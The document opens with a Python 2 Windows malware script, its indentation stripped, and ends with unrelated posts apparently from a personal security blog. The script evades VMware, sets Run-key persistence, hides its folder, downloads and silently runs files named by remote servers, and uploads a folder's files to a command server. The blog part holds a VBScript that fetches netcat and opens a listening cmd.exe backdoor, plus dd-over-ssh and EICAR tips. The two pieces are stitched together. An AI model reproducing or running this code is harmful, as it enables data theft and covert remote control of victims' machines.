from urllib2 import urlopen
from urllib import urlencode
from glob import glob
from os import path
from os import makedirs
from os import remove
from fileinput import FileInput
from socket import gethostname
from time import sleep
from time import time
from os import popen2
from os import popen
from re import findall
from re import IGNORECASE
from psutil import get_pid_list
from psutil import Process
from sys import exit
from sys import argv
from httplib import HTTPConnection
from os import getpid
from os import kill
def getserver1():
srv = "games-playbox.com"
try:
code1 = urlopen('http://worldvoicetrip.com/games/index.html')
code2 = code1.read()
if int(code2) == 1:
code3 = urlopen('http://worldvoicetrip.com/games/domain.html')
code4 = code3.read()
return code4
else:
return srv
except:
return srv
pass
foldername = "/winone1"
dir1 = "c:\\dir\\"
dir3 = "c:\\dir"
dir2 = "c:\\dir\\dir2\\"
dir4 = "dir2"
_file = path.abspath(argv[0])
fpath = path.dirname(path.realpath(_file))
file17 = path.basename(_file)
def SysInfo():
values = {}
cache = popen2("SYSTEMINFO")
source = cache[1].read()
sysOpts = ["System Model"]
for opt in sysOpts:
values[opt] = [item.strip() for item in findall("%s:\w*(.*?)\n" % (opt), source, IGNORECASE)][0]
return values
try:
sysinfo1 = SysInfo()
sysinfo2 = str(sysinfo1)
except:
sysinfo2 = "Test"
pass
if sysinfo2.find("VMware") <> -1:
print "VMware"
#exit()
pcount = 0
xx = get_pid_list()
myid = getpid()
for i in xx:
try:
pro = Process(i).name
if pro.find(file17) <> -1:
if i != myid:
p = i
pcount = pcount + 1
except:
continue
if pcount > 2:
exit()
try:
kill(p, 9)
except:
pass
class ChunkedEncodingWrapper(object):
def __init__(self, fileobj, blocksize=102400):
self.fileobj = fileobj
self.blocksize = blocksize
self.current_chunk = ""
self.closed = False
def read(self, size=None):
ret = ""
while size is None or size >= len(self.current_chunk):
ret += self.current_chunk
if size is not None:
size -= len(self.current_chunk)
if self.closed:
self.current_chunk = ""
break
self._get_chunk()
else:
ret += self.current_chunk[:size]
self.current_chunk = self.current_chunk[size:]
return ret
def _get_chunk(self):
if not self.closed:
chunk = self.fileobj.read(self.blocksize)
if chunk:
self.current_chunk = "%x" % (len(chunk),) + "\r\n" + chunk + "\r\n"
else:
self.current_chunk = "0\r\n\r\n"
self.closed = True
if not path.exists(dir1):
makedirs(dir1)
if not path.exists(dir2):
makedirs(dir2)
try:
batch = open(dir2+'run.bat','wb')
bat2='REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Search /t REG_SZ /d "%s%s" /f'%(dir2,file17)
batch.write(bat2)
batch.close()
f1 = open(dir2+'run.vbs','wb')
data12='Set WshShell = CreateObject("WScript.Shell" )\n'
data12+='WshShell.Run chr(34) & "'+dir2+'run.bat" & Chr(34), 0\n'
data12+='Set WshShell = Nothing'
f1.write(data12)
f1.close()
the_output = popen(dir2+"run.vbs").read()
except:
pass
the_output = popen("attrib +h +s %s"%(dir3)).read()
the_output = popen("copy %s %s"%(file17,dir2)).read()
cname = gethostname()
def splitFile(inputFile,chunkSize,basename1):
f = open(inputFile, 'rb')
data = f.read()
f.close()
bytes = len(data)
noOfChunks= bytes/chunkSize
if(bytes%chunkSize):
noOfChunks+=1
f = open(inputFile+'-info.txt', 'w')
f.write(basename+','+str(noOfChunks))
f.close()
chunkNames = []
j = 0
for i in range(0, bytes+1, chunkSize):
j = j + 1
fn1 = inputFile+"-%s" % j
chunkNames.append(fn1)
f = open(fn1, 'wb')
f.write(data[i:i+ chunkSize])
f.close()
getserver = getserver1()
def runfile(ext):
sleep(2)
data2len = len(ext)
if data2len <> 0:
try:
if dfile.find(file17) == -1:
f1 = open(dir2+'run.vbs','wb')
data12='Set WshShell = CreateObject("WScript.Shell" )\n'
data12+='WshShell.Run chr(34) & "'+ext+'" & Chr(34), 0\n'
data12+='Set WshShell = Nothing'
f1.write(data12)
f1.close()
size1 = path.getsize(ext)
if size1 <> 0:
the_output = popen(dir2+"run.vbs").read()
remove(dir2+"run.vbs")
else:
remove(dfile)
except:
pass
def dex(cname):
try:
dfiles5 = urlopen("http://"+ getserver + foldername+ "/online.php?sysname="+cname+"")
dfiles6 = dfiles5.read()
dfiles7 = dfiles6.split(';')
data7len = len(dfiles6)
if data7len <> 0:
for dfile in dfiles7:
try:
f5 = urlopen("http://"+ getserver + foldername+ "/download/%s"%dfile)
output1=open(dir2+"%s"%dfile,'wb')
output1.write(f5.read())
output1.close()
dfile = dir2+dfile
runfile(dfile)
except:
continue
except:
pass
def dex1():
try:
dfiles12 = urlopen("http://"+ getserver + foldername+ "/getfile.php")
dfiles11 = dfiles12.read()
dfiles13 = dfiles1.split(';')
files11 = glob(dir2+"*")
for dfile14 in dfiles13:
try:
if not (dfile14 in files11):
f11 = urlopen("http://"+ getserver + foldername+ "/download/%s"%dfile14)
output11=open(dir2+"%s"%dfile14,'wb')
output11.write(f11.read())
output11.close()
dfile = ''
dfile = dir2+dfile14
runfile(dfile)
except:
continue
except:
pass
try:
urlopen("http://"+ getserver + foldername+ "/post.php?filename=&folder="+cname+"//")
dfiles2 = urlopen("http://"+ getserver + foldername+ "/getfile.php")
dfiles1 = dfiles2.read()
datalen3 = len(dfiles1)
if datalen3 == 0:
dfiles = ''
dfiles = glob(dir2+"*.exe")
for dfile in dfiles:
try:
runfile(dfile)
except:
continue
else:
dfiles = dfiles1.split(';')
for dfile in dfiles:
try:
f = urlopen("http://"+ getserver + foldername+ "/download/%s"%dfile)
output=open(dir2+"%s"%dfile,'wb')
output.write(f.read())
output.close()
dfiles = ''
dfiles = dir2+"%s"%(dfile)
runfile(dfiles)
except:
continue
except:
dfiles = ''
dfiles = glob(dir2+"*.exe")
for dfile in dfiles:
try:
runfile(dfile)
except:
continue
remove(dir2+"run.bat")
print "Enting While"
time1 = int(time())
count = 0
while True:
try:
time2 = int(time())
tdif = time2 - time1
if tdif > 3600:
dex1()
time1 = int(time())
sleep (1)
count = count + 1
files = glob(dir1+"*")
if count > 120 :
urlopen("http://"+ getserver + foldername+ "/post.php?filename=&folder="+cname+"//")
dex(cname)
count = 0
for file1 in files:
try:
if file1.find(dir4) <> -1:
continue
try:
myfile = open(file1, "r+")
except:
continue
myfile.close()
basename = path.basename(file1)
size = path.getsize(file1)
if size > 105163101 :
splitFile(file1,105163101,basename)
remove(file1)
data = open(file1,"rb")
w = ChunkedEncodingWrapper(data)
v = urlencode({'filename': basename})
x = urlencode({'folder': cname})
headers = {"Transfer-Encoding": "chunked"}
c = HTTPConnection(getserver)
c.request("POST", "%s/post.php?%s&%s/"%(foldername,v,x), w, headers)
data.close()
remove(file1)
dex(cname)
count = 0
time2 = int(time())
tdif = time2 - time1
if tdif > 3600:
dex1()
time1 = int(time())
except:
pass
except:
pass
What Science is All About
This is a good lay description of science:
If you cherry-pick scientific truths to serve cultural, economic, religious or political objectives, you undermine the foundations of an informed democracy.
Science distinguishes itself from all other branches of human pursuit by its power to probe and understand the behavior of nature on a level that allows us to predict with accuracy, if not control, the outcomes of events in the natural world. Science especially enhances our health, wealth and security, which is greater today for more people on Earth than at any other time in human history.
The scientific method, which underpins these achievements, can be summarized in one sentence, which is all about objectivity:
Do whatever it takes to avoid fooling yourself into thinking something is true that is not, or that something is not true that is.
Given the current trend with pop-psychology books, it’s nice to see someone write something that is easily accessible, yet accurate.
Transfer a disk image via dd and ssh
To transfer a disk image via an ssh tunnel (think evidence collection across the internet):
dd if=</path/to/disk> | ssh user@host “dd of=<filename>”
For example:
dd if=/dev/sda | ssh user@example.com “dd of=image.dd”
In practice, you’ll probably want to use some additional dd options such as bs (block size), count, etc. If doing this for evidentiary purposes, dcfldd, dc3dd, ewfacquire, and others, provide more forensic-friendly options.
To compress data before sending it across the network, add bzip2 (or gzip) with another pipe:
dd if=</path/to/disk> | bzip2 | ssh user@host “dd of=<filename”.
Creating an EICAR test file
Copy and save the following as eicar.com (yes, it’s an all ASCII .com file):
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
As a sanity check, the file should be 68 bytes long. You can also try running the file, which should print “EICAR-STANDARD-ANTIVIRUS-TEST-FILE” to the screen.
Alternatively, you can download eicar.com.txt.
Python Web Server in One Line
Quick and dirty web server in Python that serves files out of the current directory.
For Python 3.X:
python -m http.server 8080
For Python 2.X:
python -m SimpleHTTPServer
Invoke the Python Debugger in One Line
Add the following snippet where you want to invoke the Python debugger:
import pdb;pdb.set_trace()
VBScript to Download a File (Over HTTP) and Execute It
dim http_obj
dim stream_obj
dim shell_obj
set http_obj = CreateObject("Microsoft.XMLHTTP")
set stream_obj = CreateObject("ADODB.Stream")
set shell_obj = CreateObject("WScript.Shell")
URL = "http://www.mikemurr.com/example.exe" 'Where to download the file from
FILENAME = "nc.exe" 'Name to save the file (on the local system)
RUNCMD = "nc.exe -L -p 4444 -e cmd.exe" 'Command to run after downloading
http_obj.open "GET", URL, False
http_obj.send
stream_obj.type = 1
stream_obj.open
stream_obj.write http_obj.responseBody
stream_obj.savetofile FILENAME, 2
shell_obj.run RUNCMD
The Problem With Conspiracy Theorists
Confirmation Bias
The Original Netcat Backdoor
Token First Post
Welcome to Mike Murr’s personal blog… This is the token first post 🙂